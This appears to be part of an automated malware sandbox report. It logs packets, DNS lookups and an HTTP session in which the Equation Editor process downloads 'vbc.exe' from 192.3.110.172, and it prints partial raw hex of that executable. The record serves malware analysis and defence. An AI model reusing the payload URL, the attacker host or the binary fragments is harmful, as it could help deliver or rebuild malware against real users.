                                              Oct 13, 2021 19:03:16.528075933 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528089046 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.528279066 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.699848890 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.699883938 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.699898005 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.699914932 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.699939013 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.699959040 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.700030088 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.700047016 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.700062990 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.700123072 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.700159073 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.701845884 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702322960 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702358007 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702382088 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702405930 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702425957 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702450991 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702476025 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702478886 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702498913 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702512026 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702517033 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702522993 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702532053 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702534914 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702548981 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702557087 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702573061 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702581882 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702600956 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702605963 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702625990 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702626944 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702649117 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702651024 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702668905 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702675104 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702692032 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702697992 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702713013 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702722073 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702744961 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702769995 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702775002 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702796936 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702821016 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702825069 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702846050 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702869892 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702876091 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702881098 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702898026 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702922106 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702925920 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702945948 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702969074 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.702970028 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.702996016 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703021049 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703021049 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703027964 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703032017 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703044891 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703068972 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703073978 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703093052 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703195095 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703221083 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703228951 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703236103 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703239918 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703243017 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703243971 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703246117 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703248978 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703252077 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703253984 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703270912 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703295946 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703298092 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703303099 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703316927 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703316927 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703342915 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.703344107 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703365088 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.703387022 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.704371929 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.704704046 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.873879910 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.873908043 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.873920918 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.873933077 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.873954058 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.873970985 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.874036074 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.874064922 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.875070095 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.875092030 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.875197887 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.875330925 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.875468969 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.876471996 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.876698017 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.876756907 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.876780033 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.876904964 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.876929045 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.876945019 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877113104 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877120018 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877136946 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877156973 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877173901 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877199888 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877219915 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877237082 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877253056 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877268076 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877284050 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877300024 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877315998 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877331972 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877351999 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877351999 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877361059 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877363920 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877367020 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877368927 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877383947 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877401114 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877415895 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877430916 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877448082 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877461910 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877481937 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877490997 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877499104 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877506971 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877537012 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877541065 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877543926 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877547026 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877549887 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877552986 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877556086 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877558947 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877562046 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877564907 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877712011 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877728939 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877794027 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878082037 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878087044 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.878107071 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.878109932 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878125906 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878134966 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.878142118 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878158092 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878201008 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.878217936 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878235102 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878241062 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.878251076 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878288031 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.878338099 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.879895926 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048145056 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048190117 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048218966 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048238039 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048244953 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048260927 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048264980 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048273087 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048299074 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048305035 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048316002 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048333883 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048338890 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048362017 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048379898 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048391104 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048418045 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048444986 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048470974 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048707962 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048732996 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048738003 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048742056 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048746109 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.049011946 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.049065113 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.049129009 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.049166918 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.049417019 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.049432993 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.049434900 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.049443007 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.049829960 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:18.350430965 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:04:37.381472111 CEST4916780192.168.2.223.64.163.50
                                              Oct 13, 2021 19:04:40.386950970 CEST4916780192.168.2.223.64.163.50
                                              Oct 13, 2021 19:04:46.393459082 CEST4916780192.168.2.223.64.163.50
                                              Oct 13, 2021 19:04:58.710510969 CEST4916880192.168.2.223.64.163.50
                                              Oct 13, 2021 19:04:58.729662895 CEST80491683.64.163.50192.168.2.22
                                              Oct 13, 2021 19:04:58.730782032 CEST4916880192.168.2.223.64.163.50
                                              Oct 13, 2021 19:04:58.731059074 CEST4916880192.168.2.223.64.163.50
                                              Oct 13, 2021 19:04:58.749098063 CEST80491683.64.163.50192.168.2.22
                                              Oct 13, 2021 19:04:58.749141932 CEST80491683.64.163.50192.168.2.22
                                              Oct 13, 2021 19:04:58.749254942 CEST4916880192.168.2.223.64.163.50

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 13, 2021 19:04:37.338116884 CEST5216753192.168.2.228.8.8.8
                                              Oct 13, 2021 19:04:37.364202976 CEST53521678.8.8.8192.168.2.22
                                              Oct 13, 2021 19:04:58.681433916 CEST5059153192.168.2.228.8.8.8
                                              Oct 13, 2021 19:04:58.704255104 CEST53505918.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Oct 13, 2021 19:04:37.338116884 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.washingtonboatrentals.comA (IP address)IN (0x0001)
                                              Oct 13, 2021 19:04:58.681433916 CEST192.168.2.228.8.8.80xd191Standard query (0)www.washingtonboatrentals.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Oct 13, 2021 19:04:37.364202976 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.washingtonboatrentals.com3.64.163.50A (IP address)IN (0x0001)
                                              Oct 13, 2021 19:04:58.704255104 CEST8.8.8.8192.168.2.220xd191No error (0)www.washingtonboatrentals.com3.64.163.50A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • 192.3.110.172
                                              • www.washingtonboatrentals.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249165192.3.110.17280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              Oct 13, 2021 19:03:15.651736975 CEST0OUTGET /000900/vbc.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 192.3.110.172
                                              Connection: Keep-Alive
                                              Oct 13, 2021 19:03:15.826574087 CEST1INHTTP/1.1 200 OK
                                              Date: Wed, 13 Oct 2021 17:03:16 GMT
                                              Server: Apache/2.4.50 (Win64) OpenSSL/1.1.1l PHP/8.0.11
                                              Last-Modified: Wed, 13 Oct 2021 06:08:09 GMT
                                              ETag: "46f39-5ce35c953b021"
                                              Accept-Ranges: bytes
                                              Content-Length: 290617
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$0(QFQFQF*^QFQGqQF*^QFrvQF.W@QFRichQFPELe:V\0p@tp|.textZ\ `.rdatap`@@.data8r@.ndataP.rsrcx@@
                                              Oct 13, 2021 19:03:15.826603889 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 48 3f 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 f4 71 40 00 e9 42 01 00 00 53 56 8b 35 50 3f 42 00 8d 45 a4
                                              Data Ascii: U\}t+}FEuHH?BHPuuuq@BSV5P?BEWPuq@eEEPuq@}ePp@FRVVU+MM3FQNUMVTUFPEEPMXp@EEPEPu
                                              Oct 13, 2021 19:03:15.826620102 CEST4INData Raw: 00 40 42 00 89 88 c0 3f 42 00 e9 85 13 00 00 8b 45 e0 8d 34 85 c0 3f 42 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d e4 8b 44 85 d8 89 0e e9 6f 13 00 00 ff 34 95 c0 3f 42 00 56 e9 ff 12 00 00 8b 0d 10 37 42 00 8b 35 5c 72 40 00 3b cb 74 07 52 51 ff d6 8b
                                              Data Ascii: @B?BE4?B3;#MDo4?BV7B5\r@;tRQE$7B;2PQ)juP|p@joW]A;tTj\V@:Eu9]t=tWU=W=;t=uWxp@uEEF:u9
                                              Oct 13, 2021 19:03:15.826637030 CEST5INData Raw: 45 e4 e9 5e 0e 00 00 76 86 8b 45 e8 e9 54 0e 00 00 6a 01 e8 90 0f 00 00 6a 02 8b f8 e8 87 0f 00 00 8b c8 8b 45 e4 83 f8 0c 77 6d ff 24 85 d8 29 40 00 03 f9 eb 62 2b f9 eb 5e 0f af cf 8b f9 eb 57 3b cb 74 42 8b c7 99 f7 f9 8b f8 eb 4a 0b f9 eb 46
                                              Data Ascii: E^vETjjEwm$)@b+^W;tBJF#B3>3;;u3+;t;t3G;t3EW_j jPWV4r@E=@;tDH;?;u;@WVB@
                                              Oct 13, 2021 19:03:16.003546000 CEST7INData Raw: 01 8b f0 e8 83 0a 00 00 39 5d e8 89 45 08 74 0d 56 ff 15 44 71 40 00 8b f8 3b fb 75 10 6a 08 53 56 ff 15 40 71 40 00 8b f8 3b fb 74 7a ff 75 08 57 ff 15 10 71 40 00 8b f0 3b f3 74 3d 39 5d e0 89 5d fc 74 17 ff 75 e0 e8 38 f4 ff ff ff d6 85 c0 74
                                              Data Ascii: 9]EtVDq@;ujSV@q@;tzuWq@;t=9]]tu8t1E(h@h@hPBhuujb.9]WZWHq@yjKjDjjEjjEjEEVEn6uj!
                                              Oct 13, 2021 19:03:16.003576994 CEST8INData Raw: e0 ff 75 dc 50 e8 8d 33 00 00 83 f8 ff 0f 84 a2 01 00 00 50 e9 70 f0 ff ff 39 5d e0 74 11 6a 01 e8 0f 05 00 00 a2 10 a0 40 00 33 c0 40 eb 0d 6a 11 e8 1b 05 00 00 50 e8 9a 36 00 00 38 1e 0f 84 73 01 00 00 8d 4d 08 53 51 50 68 10 a0 40 00 56 e8 e2
                                              Data Ascii: uP3Pp9]tj@3@jP68sMSQPh@V5P4q@mj]Eo;~M8V]59]E~}uESPEjPu$q@te}u_9]u!}t+}t%E>F:Et@;u|9EPW05
                                              Oct 13, 2021 19:03:16.003595114 CEST10INData Raw: 08 9c 40 00 ff 34 81 6a 00 e8 9a 31 00 00 50 e8 e9 30 00 00 c2 04 00 56 8b 74 24 08 85 f6 57 8b c6 7d 02 f7 d8 8b 15 08 9c 40 00 8b c8 83 e1 0f c1 f8 04 ff 34 8a c1 e0 0a 05 10 9c 40 00 50 e8 64 31 00 00 85 f6 8b f8 7d 06 57 e8 98 33 00 00 8b c7
                                              Data Ascii: @4j1P0Vt$W}@4@Pd1}W3_^USVEWP?B3PSuup@;ui5$p@9]uKSPuuWPSutup@jL4;t$S5?Buuup@3@_^[9
